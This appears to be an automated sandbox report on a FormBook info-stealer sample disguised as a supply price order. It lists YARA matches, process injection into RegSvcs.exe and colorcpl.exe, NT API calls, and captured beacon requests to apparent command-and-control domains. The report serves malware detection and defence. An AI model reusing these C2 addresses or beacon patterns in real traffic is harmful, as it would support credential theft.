          Source: global trafficHTTP traffic detected: GET /rgoe/?0N9=p62UTdjvvun5m4F6E/NDs8CkSXewz0Mmd3OAmKShvilGuUBo5ij0sMfMI9B7yPSR/U/saD/cPg==&n0DhB=j0DpGx9XxT-Tnhk HTTP/1.1Host: www.newhollandpurpose.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /rgoe/?0N9=/t1+ewTNvP58zbN/GTmlHuihgocL7TvwecIdqR1o1yMMHUTs/zxhPcif7gHrks2EHupuL2PvCA==&n0DhB=j0DpGx9XxT-Tnhk HTTP/1.1Host: www.adronesview.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /rgoe/?n0DhB=j0DpGx9XxT-Tnhk&0N9=mDrA6fi9xoCJEIFZWb9JZI5ban60MroB6V8+OTFSy0K1Nt6g1YYxY5Is4mBDlN3bRVBdzT2BPw== HTTP/1.1Host: www.teelandcompany.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: SUPPLY_PRICE_ORDER_9978484DF.exe, 00000000.00000002.267392729.000000000169B000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000E.00000002.509955285.00000000025A0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.330815984.0000000000B40000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.330932008.0000000000C60000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.510129850.00000000025D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.300246548.000000000E040000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.330534936.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.509697209.00000000024A0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.269111767.0000000004251000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.320533115.000000000E040000.00000040.00020000.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.509955285.00000000025A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.509955285.00000000025A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.330815984.0000000000B40000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.330815984.0000000000B40000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.330932008.0000000000C60000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.330932008.0000000000C60000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.510129850.00000000025D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.510129850.00000000025D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.300246548.000000000E040000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.300246548.000000000E040000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.330534936.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.330534936.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.509697209.00000000024A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.509697209.00000000024A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.269111767.0000000004251000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.269111767.0000000004251000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.320533115.000000000E040000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.320533115.000000000E040000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: SUPPLY_PRICE_ORDER_9978484DF.exe
          .NET source code contains very large stringsShow sources
          Source: SUPPLY_PRICE_ORDER_9978484DF.exe, Darwin.WindowsForm/SearchResults.csLong String: Length: 34816
          Source: SUPPLY_PRICE_ORDER_9978484DF.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.509955285.00000000025A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.509955285.00000000025A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.330815984.0000000000B40000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.330815984.0000000000B40000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.330932008.0000000000C60000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.330932008.0000000000C60000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.510129850.00000000025D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.510129850.00000000025D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.300246548.000000000E040000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.300246548.000000000E040000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.330534936.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.330534936.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.509697209.00000000024A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.509697209.00000000024A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.269111767.0000000004251000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.269111767.0000000004251000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.320533115.000000000E040000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.320533115.000000000E040000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeCode function: 0_2_0167C1940_2_0167C194
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeCode function: 0_2_0167E5E00_2_0167E5E0
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeCode function: 0_2_0167E5F00_2_0167E5F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004010273_2_00401027
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004010303_2_00401030
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0041C9663_2_0041C966
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0041B9313_2_0041B931
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004012083_2_00401208
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0041BB7C3_2_0041BB7C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0041CBD93_2_0041CBD9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00408C8B3_2_00408C8B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00408C903_2_00408C90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0041C5D13_2_0041C5D1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00402D903_2_00402D90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0041A6B63_2_0041A6B6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00402FB03_2_00402FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0117F9003_2_0117F900
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011941203_2_01194120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_012310023_2_01231002
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0118B0903_2_0118B090
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011AEBB03_2_011AEBB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01170D203_2_01170D20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01241D553_2_01241D55
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011A25813_2_011A2581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0118D5E03_2_0118D5E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0118841F3_2_0118841F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01196E303_2_01196E30
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046F100214_2_046F1002
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0464841F14_2_0464841F
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0464B09014_2_0464B090
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04701D5514_2_04701D55
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04630D2014_2_04630D20
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0465412014_2_04654120
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0463F90014_2_0463F900
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0464D5E014_2_0464D5E0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0466258114_2_04662581
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04656E3014_2_04656E30
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0466EBB014_2_0466EBB0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_025BBB7C14_2_025BBB7C
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_025BCBD914_2_025BCBD9
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_025BC96614_2_025BC966
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_025BB93114_2_025BB931
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_025BA6B614_2_025BA6B6
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_025A2FB014_2_025A2FB0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_025A8C9014_2_025A8C90
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_025A8C8B14_2_025A8C8B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_025A2D9014_2_025A2D90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0117B150 appears 32 times
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 0463B150 appears 32 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004185D0 NtCreateFile,3_2_004185D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00418680 NtReadFile,3_2_00418680
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00418700 NtClose,3_2_00418700
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004187B0 NtAllocateVirtualMemory,3_2_004187B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004185CB NtCreateFile,3_2_004185CB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0041867A NtReadFile,3_2_0041867A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004186FB NtClose,3_2_004186FB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0041872A NtClose,3_2_0041872A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004187AA NtAllocateVirtualMemory,3_2_004187AA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011B9910 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_011B9910
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011B99A0 NtCreateSection,LdrInitializeThunk,3_2_011B99A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011B9840 NtDelayExecution,LdrInitializeThunk,3_2_011B9840
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011B9860 NtQuerySystemInformation,LdrInitializeThunk,3_2_011B9860
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011B98F0 NtReadVirtualMemory,LdrInitializeThunk,3_2_011B98F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011B9A00 NtProtectVirtualMemory,LdrInitializeThunk,3_2_011B9A00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011B9A20 NtResumeThread,LdrInitializeThunk,3_2_011B9A20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011B9A50 NtCreateFile,LdrInitializeThunk,3_2_011B9A50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011B9540 NtReadFile,LdrInitializeThunk,3_2_011B9540
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011B95D0 NtClose,LdrInitializeThunk,3_2_011B95D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011B9710 NtQueryInformationToken,LdrInitializeThunk,3_2_011B9710
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011B9780 NtMapViewOfSection,LdrInitializeThunk,3_2_011B9780
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011B97A0 NtUnmapViewOfSection,LdrInitializeThunk,3_2_011B97A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011B9FE0 NtCreateMutant,LdrInitializeThunk,3_2_011B9FE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011B9660 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_011B9660
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011B96E0 NtFreeVirtualMemory,LdrInitializeThunk,3_2_011B96E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011B9950 NtQueueApcThread,3_2_011B9950
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011B99D0 NtCreateProcessEx,3_2_011B99D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011B9820 NtEnumerateKey,3_2_011B9820
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011BB040 NtSuspendThread,3_2_011BB040
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011B98A0 NtWriteVirtualMemory,3_2_011B98A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011B9B00 NtSetValueKey,3_2_011B9B00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011BA3B0 NtGetContextThread,3_2_011BA3B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011B9A10 NtQuerySection,3_2_011B9A10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011B9A80 NtOpenDirectoryObject,3_2_011B9A80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011BAD30 NtSetContextThread,3_2_011BAD30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011B9520 NtWaitForSingleObject,3_2_011B9520
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011B9560 NtWriteFile,3_2_011B9560
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011B95F0 NtQueryInformationFile,3_2_011B95F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011BA710 NtOpenProcessToken,3_2_011BA710
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011B9730 NtQueryVirtualMemory,3_2_011B9730
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011B9770 NtSetInformationFile,3_2_011B9770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011BA770 NtOpenThread,3_2_011BA770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011B9760 NtOpenProcess,3_2_011B9760
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011B9610 NtEnumerateValueKey,3_2_011B9610
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011B9650 NtQueryValueKey,3_2_011B9650
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011B9670 NtQueryInformationProcess,3_2_011B9670
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011B96D0 NtCreateKey,3_2_011B96D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04679860 NtQuerySystemInformation,LdrInitializeThunk,14_2_04679860
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04679840 NtDelayExecution,LdrInitializeThunk,14_2_04679840
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04679540 NtReadFile,LdrInitializeThunk,14_2_04679540
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04679910 NtAdjustPrivilegesToken,LdrInitializeThunk,14_2_04679910
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046795D0 NtClose,LdrInitializeThunk,14_2_046795D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046799A0 NtCreateSection,LdrInitializeThunk,14_2_046799A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04679660 NtAllocateVirtualMemory,LdrInitializeThunk,14_2_04679660
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04679A50 NtCreateFile,LdrInitializeThunk,14_2_04679A50
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04679650 NtQueryValueKey,LdrInitializeThunk,14_2_04679650
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046796E0 NtFreeVirtualMemory,LdrInitializeThunk,14_2_046796E0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046796D0 NtCreateKey,LdrInitializeThunk,14_2_046796D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04679710 NtQueryInformationToken,LdrInitializeThunk,14_2_04679710
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04679FE0 NtCreateMutant,LdrInitializeThunk,14_2_04679FE0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04679780 NtMapViewOfSection,LdrInitializeThunk,14_2_04679780
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0467B040 NtSuspendThread,14_2_0467B040
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04679820 NtEnumerateKey,14_2_04679820
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046798F0 NtReadVirtualMemory,14_2_046798F0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046798A0 NtWriteVirtualMemory,14_2_046798A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04679560 NtWriteFile,14_2_04679560
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04679950 NtQueueApcThread,14_2_04679950
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04679520 NtWaitForSingleObject,14_2_04679520
